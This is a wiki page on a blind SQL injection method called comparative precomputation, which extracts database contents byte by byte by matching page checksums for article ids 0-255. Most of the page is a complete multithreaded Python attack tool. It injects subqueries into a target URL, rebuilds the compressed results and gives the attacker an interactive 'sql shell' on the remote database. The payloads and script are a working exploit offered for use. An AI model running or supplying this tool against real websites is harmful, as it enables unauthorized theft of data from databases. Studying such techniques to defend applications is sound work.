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SQL injection/Blind/Extraction/Precomputation

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Revision as of 06:03, 15 November 2012 by LashawnSeccombe (Talk | contribs)

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The comparative precomputation attack

This attack relies heavily on the remote dataset for successful exploitation and is thus less reliable than other methods. This significantly differs from previously discovered single-byte exfiltration techniques because:

  • It is based on precomputation
  • It is not a timing attack

Requirements:

  • The query which is being injecting into must have at least 254 rows
  • The precomputation attack is compatible with all database backends.
Precomputation is done for performance reasons. At the very least, a comparative test will be required. The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.
  • Examining the following query:
  $query = "select * from articles where id=$input";
  • And the following uri:
 /articles.php?id=1
  • Testing can be used to see if there are 255 articles by visiting:
 /articles.php?id=255 Follow the next steps for automation (and sanity's) sake:
  • Choose a language supporting something similar to array_flip() for programming the automation tool.
  • Write a loop to download each article
  • In the loop, populate an array (using integer indexes) with checksum hashes as values
  • Flip the array

Almost done!

  • Then the following visit can take place:
 /articles.php?id=ascii(substr(user(),1,1))
  • Checksum the output
  • Now accessing the checksums array using the checksum of the output as the key:
  $ascii_code = $checksums[$output_checksum];

And the value of a byte has been determined.

Protip: This attack can be extended by:
  • Using arithmetic operators to get sequential id's offset from 0-255 (e.g. /articles.php?id=(select ascii(substr(user(),1,1))+67)
  • Using MySQL field operators and a static query that returns id's to bypass the requirement for the id's to be sequential
#!/usr/bin/python2
import sys
import urllib2
import time
from binascii import hexlify
import _mysql
import md5
import pickle
import re
import os
import threading
import Queue
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
 
BOLD = '\033[1m'
BLUE = '\033[34m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[91m'
ENDC = '\033[0m'
 
def request(request_url):
  req = urllib2.Request(request_url)
  req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
  r = urllib2.urlopen(req)
  return r.read()
 
def construct_discovery_query(url, column, table, counter):
  discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
  discovery =  discovery % (column, column, table, counter)
  return url + urllib2.quote(discovery)
 
def construct_injection_query(url, column, table, query, position):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
  injection = injection % (column, column, table, query, position)
  return url + urllib2.quote(injection)
 
def get_length(url, column, table, query, ascii_table, counter):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
  length_length = url + urllib2.quote(injection)
  length_length = ascii_table[md5.new(request(length_length)).digest()]
  counter += 1
 
  length = ""
  for i in range(1,length_length+1):
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))" 
    injection = injection % (column, column, table, query, i)
    request_url = url + urllib2.quote(injection)
    length += chr(ascii_table[md5.new(request(request_url)).digest()])
    counter += 1
 
  return (int(length), counter)
 
def get_query(prompt):
  while 1:
    query = raw_input(prompt)
    if query != "":
      break
  return query
 
def do_query(url, column, table, query, ascii_table, i, q):
  tmp = construct_injection_query(url, column, table, query, i)
  q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
 
def do_table(url, column, table, i, q):
  tmp = construct_discovery_query(url, column, table, i)
  q.put(md5.new(request(tmp)).digest())
 
def print_percent(percent, start_time):
  elapsed_time = time.time() - start_time
  eta = ((elapsed_time) / percent) * 100 - elapsed_time
  sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
  sys.stdout.flush()
 
def do_thread(target, args, counter, length, type_query):
  if type_query == 0:
    ascii_table = {}
  else:
    query_result = ""
 
  if type_query == 0:
    i = 0
  else:
    i = 1
 
 
  sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
  sys.stdout.flush()
  start_time = time.time()
 
  while i < length:
    threads = {}
    queues  = []
 
    for j in range(0,11):
      if i < length:
        queues.append(Queue.Queue())
        threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
        i += 1
        counter += 1
        print_percent(100 * float(i) / float(length), start_time)
 
    for thread in threads:
      threads[thread].start()
 
    for j, thread in enumerate(sorted(threads.iterkeys())):
      if type_query == 0:
        ascii_table[queues[j].get()] = thread
      else:
        query_result += queues[j].get()
      threads[thread].join()
 
  sys.stdout.write('\n')
  sys.stdout.flush()
 
  if type_query == 0:
    return ascii_table
  else:
    return (counter, query_result)
 
def main(url, column, table):
  session_name = re.split("(https?://)?(.*)/", url)[2]
 
  print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
  try:
    try:
      os.stat("data")
    except:
      os.mkdir("data")
    ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
    print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
  except:
    print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
    current = time.time()
    ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
    pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
    print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
 
  print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
 
  while 1:
    query = get_query("%ssql shell>%s " % (BOLD, ENDC))
    if query == "exit":
      break
 
    query_result = ""
    counter = 0
    current = time.time()
    (length, counter) = get_length(url, column, table, query, ascii_table, counter)
 
    (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
 
    query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
    mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
    mysql_connection.query(query)
    result = mysql_connection.use_result()
    data = result.fetch_row()[0][0]
    mysql_connection.close()
 
    print data
    print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
 
  print "%s[*]%s Good bye" % (GREEN, ENDC)
 
if __name__=="__main__":
  if len(sys.argv) != 4:
    print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
    exit()
 
  print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
  main(sys.argv[1], sys.argv[2], sys.argv[3])
 
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